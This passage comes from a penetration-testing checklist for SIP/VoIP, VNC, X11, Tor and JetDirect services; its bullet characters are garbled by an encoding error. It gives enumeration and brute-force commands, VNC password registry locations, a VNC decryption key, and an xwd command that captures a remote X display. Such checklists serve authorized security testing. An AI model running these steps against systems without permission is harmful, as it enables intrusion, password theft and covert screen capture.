726 â—‹ SIP Enumeration
727 § netcat
728 â–¡ nc IP_Address Port
729 § sipflanker
730 â–¡ python sipflanker.py 192.168.1-254
731 § Sipscan
732 § smap
733 â–¡ smap IP_Address/Subnet_Mask
734 â–¡ smap -o IP_Address/Subnet_Mask
735 â–¡ smap -l IP_Address
736 â—‹ SIP Packet Crafting etc.
737 § sipsak
738 â–¡ Tracing paths: - sipsak -T -s sip:usernaem@domain
739 â–¡ Options request:- sipsak -vv -s sip:username@domain
740 â–¡ Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
741 § siprogue
742 â—‹ SIP Vulnerability Scanning/ Brute Force
743 § tftp bruteforcer
744 â–¡ Default dictionary file
745 â–¡ ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
746 § VoIPaudit
747 § SiVuS
748 â—‹ Examine Configuration Files
749 § SIPDefault.cnf
750 § asterisk.conf
751 § sip.conf
752 § phone.conf
753 § sip_notify.conf
754 § <Ethernet address>.cfg
755 § 000000000000.cfg
756 § phone1.cfg
757 § sip.cfg etc. etc.
758• VNC port 5900^ open
759 â—‹ VNC Enumeration
760 § Scans
761 â–¡ 5900^ for direct access.5800 for HTTP access.
762 â—‹ VNC Brute Force
763 § Password Attacks
764 â–¡ Remote
765 ® Password Guess
766 â—Š vncrack
767 ® Password Crack
768 â—Š vncrack
769 â—Š Packet Capture
770 } Phosshttp://www.phenoelit.de/phoss
771 â–¡ Local
772 ® Registry Locations
773 â—Š \HKEY_CURRENT_USER\Software\ORL\WinVNC3
774 â—Š \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3
775 ® Decryption Key
776 â—Š 0x238210763578887
777 â—‹ Exmine Configuration Files
778 § .vnc
779 § /etc/vnc/config
780 § $HOME/.vnc/config
781 § /etc/sysconfig/vncservers
782 § /etc/vnc.conf
783• X11 port 6000^ open
784 â—‹ X11 Enumeration
785 § List open windows
786 § Authentication Method
787 â–¡ Xauth
788 â–¡ Xhost
789 â—‹ X11 Exploitation
790 § xwd
791 â–¡ xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
792 § Keystrokes
793 â–¡ Received
794 â–¡ Transmitted
795 § Screenshots
796 § xhost +
797 â—‹ Examine Configuration Files
798 § /etc/Xn.hosts
799 § /usr/lib/X11/xdm
800 â–¡ Search through all files for the command "xhost +" or "/usr/bin/X11/xhost +"
801 § /usr/lib/X11/xdm/xsession
802 § /usr/lib/X11/xdm/xsession-remote
803 § /usr/lib/X11/xdm/xsession.0
804 § /usr/lib/X11/xdm/xdm-config
805 â–¡ DisplayManager*authorize:on
806• Tor Port 9001, 9030 open
807 â—‹ Tor Node Checker
808 § Ip Pages
809 § Kewlio.net
810 â—‹ nmap NSE script
811• Jet Direct 9100 open
812 â—‹ hijetta